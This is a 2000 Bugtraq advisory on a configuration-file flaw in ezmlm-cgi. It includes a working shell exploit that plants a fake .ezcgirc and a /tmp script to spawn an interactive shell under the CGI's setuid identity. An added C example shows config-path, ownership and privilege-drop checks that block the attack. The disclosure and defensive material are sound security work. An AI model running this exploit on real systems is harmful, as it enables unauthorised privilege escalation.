Date: Tue, 5 Dec 2000 10:19:51 +1100
From: vort-fu <vort@WIRETAPPED.NET>
Subject: ezmlm-cgi
To: BUGTRAQ@SECURITYFOCUS.COM

Package  : ezmlm-0.53 and below (ezmlm-cgi)
Announced: 2000-12-05

Ezmlm is an easy-to-use mailing list manager for qmail. It ships with a CGI
application that allows mailing list archives to be browsed and reviewed over
the web.

The documentation states that the CGI should be installed setuid root, but in
real-world environments many administrators are not likely to blindly setuid
root any file they haven't coded themselves (and then some). Typically the
file is instead installed setuid to some user x, which lets the CGI access
the mailing list configuration for that particular user.

However, when it is not installed setuid root, ezmlm-cgi attempts to read its
configuration file from the current working directory instead of from
/etc/ezmlm/. Anyone who can choose the working directory can therefore supply
their own configuration file and have ezmlm-cgi execute arbitrary commands
under the effective uid of the file.

Example code:

    #!/bin/sh
    #
    # ezmlm-cgi
    # vort@wiretapped.net

    # Run from a directory we control: the non-root-setuid cgi reads its
    # configuration (.ezcgirc) from the cwd rather than /etc/ezmlm/.
    cd /tmp

    # Minimal CGI environment so ezmlm-cgi believes it was invoked by a web server.
    export HTTP_HOST=x
    export SERVER_NAME=x
    export SCRIPT_NAME=x

    # Our own configuration file (field layout as in the original post); it names
    # /tmp/x and /bin/sh, which the cgi executes under its effective uid.
    echo "0;1005;/home/2600/list;/tmp/x@/tmp/x;;;;/bin/sh" > /tmp/.ezcgirc

    # The payload: an interactive shell, inheriting the cgi's effective uid.
    echo "#!/bin/sh" > /tmp/x
    echo "/bin/sh -i" >> /tmp/x
    chmod +x /tmp/x

    # Invoke the setuid cgi (path from the original post).
    /home/2600/2600-cgi/ezmlm-cgi

    # Clean up after the shell exits.
    rm -rf /tmp/x
    rm -rf /tmp/.ezcgirc

It is interesting to note that, for a program which asks to be installed
setuid root, it neither drops privileges when executing the banner directive
of the configuration file nor makes any attempt to read the configuration from
the base directory where the program itself is stored. Actually, having this
script setuid root will fix this particular bug, but I wouldn't be surprised
if there were many others in the code. I advise removing or disabling this CGI
until an official patch has been released.

vortfu
vort@wiretapped.net
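As an added illustration (this is not ezmlm's code and not part of the original post), the following C program shows the checks a setuid CGI can apply so that the attack above fails: open the configuration only under a fixed absolute directory (never the cwd), verify with fstat that it is a regular file owned by root or the program's effective uid and not group- or world-writable, and permanently drop to the real uid/gid before running any command the file names. The function names, the CONFIG_DIR constant (taken from the advisory's mention of /etc/ezmlm/) and the CONFIG_NAME constant (taken from the exploit's .ezcgirc) are assumptions, not ezmlm's real identifiers; demo_config_fd() is scaffolding that builds a constructed temporary file to exercise the check.

```c
/* Added example, not code from ezmlm or from the advisory. Function names,
 * CONFIG_DIR and CONFIG_NAME are assumptions taken from the advisory text and
 * the exploit script, not ezmlm's actual identifiers. */
#define _POSIX_C_SOURCE 200809L
#include <sys/stat.h>
#include <fcntl.h>
#include <unistd.h>
#include <stdio.h>
#include <stdlib.h>
#include <string.h>

#define CONFIG_DIR  "/etc/ezmlm"   /* fixed and absolute; never the cwd */
#define CONFIG_NAME ".ezcgirc"     /* assumed from the exploit script */

/* 1 if the already-open config file may be trusted by a privileged program:
 * a regular file, owned by root or by the program's effective uid, and not
 * writable by group or others. A file an attacker drops in /tmp, as in the
 * exploit above, fails the ownership test (or the permission test). */
int config_is_trusted(int fd, uid_t euid)
{
    struct stat st;
    if (fstat(fd, &st) != 0) return 0;
    if (!S_ISREG(st.st_mode)) return 0;
    if (st.st_uid != 0 && st.st_uid != euid) return 0;
    if (st.st_mode & (S_IWGRP | S_IWOTH)) return 0;
    return 1;
}

/* Open `name` under an absolute directory only. Rejects relative directories
 * (which would resolve against the cwd) and names containing a slash (which
 * could escape the directory). O_NOFOLLOW stops a symlink planted at the
 * expected path from redirecting the read. Returns an fd, or -1. */
int open_trusted_config(const char *dir, const char *name, uid_t euid)
{
    char path[4096];
    if (dir[0] != '/' || strchr(name, '/') != NULL) return -1;
    if (snprintf(path, sizeof path, "%s/%s", dir, name) >= (int)sizeof path)
        return -1;
    int fd = open(path, O_RDONLY | O_NOFOLLOW);
    if (fd < 0) return -1;
    if (!config_is_trusted(fd, euid)) { close(fd); return -1; }
    return fd;
}

/* Permanently give up the setuid/setgid identity: gid first (after setuid the
 * process may no longer be allowed to change it), then uid, then verify. */
int drop_privileges(void)
{
    uid_t ruid = getuid();
    gid_t rgid = getgid();
    if (setgid(rgid) != 0) return -1;
    if (setuid(ruid) != 0) return -1;
    if (geteuid() != ruid || getegid() != rgid) return -1;
    return 0;
}

/* Run a command named in the configuration (the "banner" directive, in the
 * advisory's terms) only after privileges are dropped; -1 if that fails. */
int run_banner(const char *cmd)
{
    if (drop_privileges() != 0) return -1;
    return system(cmd);
}

/* Scaffolding: a constructed temporary file with the given mode, unlinked at
 * once so only the open descriptor remains. Used to exercise the check. */
int demo_config_fd(mode_t mode)
{
    char tmpl[] = "/tmp/ezcgirc-demo-XXXXXX";
    int fd = mkstemp(tmpl);
    if (fd < 0) return -1;
    unlink(tmpl);
    if (fchmod(fd, mode) != 0) { close(fd); return -1; }
    return fd;
}

int main(void)
{
    int good = demo_config_fd(0644);
    int bad  = demo_config_fd(0666);
    printf("0644 owned by us   : %s\n",
           config_is_trusted(good, geteuid()) ? "trusted" : "rejected");
    printf("0666 world-writable: %s\n",
           config_is_trusted(bad, geteuid()) ? "trusted" : "rejected");
    printf("relative config dir: %s\n",
           open_trusted_config("etc", CONFIG_NAME, geteuid()) < 0 ? "rejected" : "opened");
    return 0;
}
```

The ownership test is what defeats the exploit even when the binary is setuid to an ordinary user x rather than root: a .ezcgirc written by a different local user is rejected regardless of where it lives, and the relative-directory check removes the cwd from the search entirely. Dropping privileges before system() is the separate fix for the banner directive; it means a command taken from a configuration file runs only with the identity of whoever invoked the CGI.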